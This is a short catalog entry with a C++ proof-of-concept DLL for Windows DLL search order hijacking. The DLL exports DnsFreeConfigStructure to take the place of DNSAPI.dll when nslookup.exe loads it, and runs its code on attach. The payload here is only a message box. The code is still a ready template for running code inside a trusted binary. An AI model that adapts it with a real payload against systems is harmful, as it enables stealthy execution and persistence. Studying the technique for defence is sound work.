C++ / Hijack Execution Flow: DLL Search Order Hijacking

Windows C++ / Hijack Execution Flow: DLL Search Order Hijacking

Author	Sh0ckFR
Platform	Windows
Language	C++
Technique	Hijack Execution Flow: DLL Search Order Hijacking

Description:

DLL Search Order Hijacking via DnsFreeConfigStructure function in the DLL DNSAPI.dll of the executable nslookup.exe.

Code

#include <windows.h>

int Main() {
    MessageBoxW(0, L"DLL Search Order Hijacking is present", L"DLL Search Order Hijacking", 0);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)Main, NULL, NULL, NULL);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

__declspec(dllexport) void DnsFreeConfigStructure() { Main(); }

Download Raw

Created

July 25, 2022

Last Revised

April 22, 2024